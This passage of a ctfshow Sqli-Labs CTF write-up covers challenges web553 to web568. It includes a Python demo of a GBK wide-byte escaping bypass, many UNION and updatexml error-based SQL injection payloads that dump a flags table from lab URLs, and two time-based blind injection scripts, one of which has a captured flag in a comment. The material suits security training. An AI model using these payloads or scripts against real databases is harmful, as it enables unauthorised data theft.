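        if ch in "'\"" and (i == 0 or text[i - 1] != "\\"):
            return False
    return True


def escape_text(raw: bytes, charset: str) -> str:
    """Character-level escaping: decode strictly first, so input whose bytes are
    not valid in the connection charset is rejected instead of re-interpreted."""
    text = raw.decode(charset)  # raises UnicodeDecodeError on bad byte sequences
    return text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def demo() -> dict:
    # Constructed sample: the web553 id value, sent as UTF-8 by the browser.
    # "汉" is E6 B1 89; after escaping the quote the tail is 89 5C 27, and in GBK
    # 89 5C is one valid double-byte character, which orphans the quote.
    payload = "1.1汉' union select 1,2,3".encode("utf-8")
    escaped = escape_bytes(payload)
    out = {
        "gbk_safe": quotes_still_escaped(escaped, "gbk"),      # expected False
        "utf8_safe": quotes_still_escaped(escaped, "utf-8"),   # expected True
    }
    try:
        escape_text(payload, "gbk")
        out["gbk_strict"] = "accepted"
    except UnicodeDecodeError:
        out["gbk_strict"] = "rejected"   # 89 27 is not a valid GBK sequence
    out["utf8_text"] = escape_text(payload, "utf-8")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The same mechanism applies to a bare %df prefix: DF 5C is likewise a valid GBK pair, which is why the page says anything with a lead byte at or above %df will do.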

web554

Change to POST parameters.

passwd='&uname=汉' union select 1,(select group_concat(flag4s) from ctfshow.flags) #

web555

http://09ecb96f-d4be-426f-921c-ea2e2843e1ef.challenge.ctf.show:8080/?id=1.1 union select 1,2,(select group_concat(flag4s) from ctfshow.flags)

web556

POST

passwd=1&uname=1汉' union select 1,(select group_concat(flag4s) from ctfshow.flags )#

web556

http://22c4b934-153e-44df-9445-c6226ac0ac9c.challenge.ctf.show:8080/?id=1111' union select 1,2,(select group_concat(flag4s) from ctfshow.flags) %23

web557

http://22c4b934-153e-44df-9445-c6226ac0ac9c.challenge.ctf.show:8080/?id=1111' union select 1,2,(select group_concat(flag4s) from ctfshow.flags) %23

web558

http://22c4b934-153e-44df-9445-c6226ac0ac9c.challenge.ctf.show:8080/?id=1111' union select 1,2,(select group_concat(flag4s) from ctfshow.flags) %23

web559

http://75bb73cb-5451-44d8-8cb3-d6f44fbda222.challenge.ctf.show:8080/?id=0 union select 1,2,(select group_concat(flag4s) from ctfshow.flags)

web560

http://c895e905-3a52-4e50-b89d-2b9ddcc32932.challenge.ctf.show:8080/?id=1.1')union select 1,2,(select group_concat(flag4s) from ctfshow.flags)%23

web561

http://c235305-3a52-4e50-b89d-2b9ddcc32932.challenge.ctf.show:8080/?id=1.1 union select 1,2,(select group_concat(flag4s) from ctfshow.flags)%23

web562

login_user=123&login_password=123' or updatexml(1,concat(0x3d,(select right(group_concat(flag4s),20) from ctfshow.flags)),1) #&mysubmit=Login

web563

login_user=1&login_password=')or updatexml(1,concat(0x3d,(select right(group_concat(flag4s),20) from ctfshow.flags)),1)#&mysubmit=Login

web564

http://3ba671d4-5c42-4e8a-a797-07e6ee44a52b.challenge.ctf.show:8080/?sort=updatexml(1,concat(0x3d,(select right(group_concat(flag4s),30) from ctfshow.flags)),1)

web565

http://e39b572e-e357-4c36-a5c6-938f53ae7946.challenge.ctf.show:8080/?sort=1' or updatexml(1,concat(0x3d,(select right(group_concat(flag4s),30) from ctfshow.flags)),1)%23

web566

A time-based blind injection script can be written for this one.

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://c2fd5b24-8246-4a1f-a529-b67bacd1f312.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="database()"
# -------- tables
#sql= "SelecT(group_concat(table_name))from(information_schema.tables)where`table_schema`='ctfshow'"
# -------- columns
#sql= "SelecT(group_concat(column_name))from(information_schema.columns)where`table_schema`='ctfshow'||`table_name`='flags'"
# -------- flag
sql= "SelecT`flag4s`from(ctfshow.flags)"
#*************************************************************************************************************************************************************
payload = "?sort=if(ascii(substr(({}),{},1))>'{}',sleep(0.05),0)"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        # sleep() runs once per row in ORDER BY, so 0.05 s per row adds up to a measurable delay
        start = time.time()
        res = requests.get(url=url_get)
        end = time.time()
        print(end-start)
        if end-start > 0.5:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web567

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://85177ce8-3c71-4581-984f-06a432d68995.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="database()"
# -------- tables
#sql= "SelecT(group_concat(table_name))from(information_schema.tables)where`table_schema`='ctfshow'"
# -------- columns
#sql= "SelecT(group_concat(column_name))from(information_schema.columns)where`table_schema`='ctfshow'||`table_name`='flags'"
# -------- flag
sql= "SelecT`flag4s`from(ctfshow.flags)"
#*************************************************************************************************************************************************************
payload = "?sort=if(ascii(substr(({}),{},1))>'{}',sleep(0.05),0)"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        start = time.time()
        res = requests.get(url=url_get)
        end = time.time()
        print(end-start)
        if end-start > 0.7 :
            head = mid + 1 #ctfshow{6e5fc803-1b1e-4P1a-b7d5-8c6b2620e08a}
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web568

http://3014ef4e-da57-4cda-8e9d-69e8b8789ae9.challenge.ctf.show:8080/?sort=1' or updatexml(1,concat(0x3d,(select right(group_concat(flag4s),20) from ctfshow.flags)),1)%23

Title: [ctfshow] Web: Sqli-Labs writeup

Author: 孤桜懶契

Published: 2021-08-09 07:21:35

Last updated: 2022-05-20 11:47:45

Original link: https://gylq.gitee.io/posts/87.html

License: CC BY-NC-ND 4.0 International. Please keep the original link and author when reposting.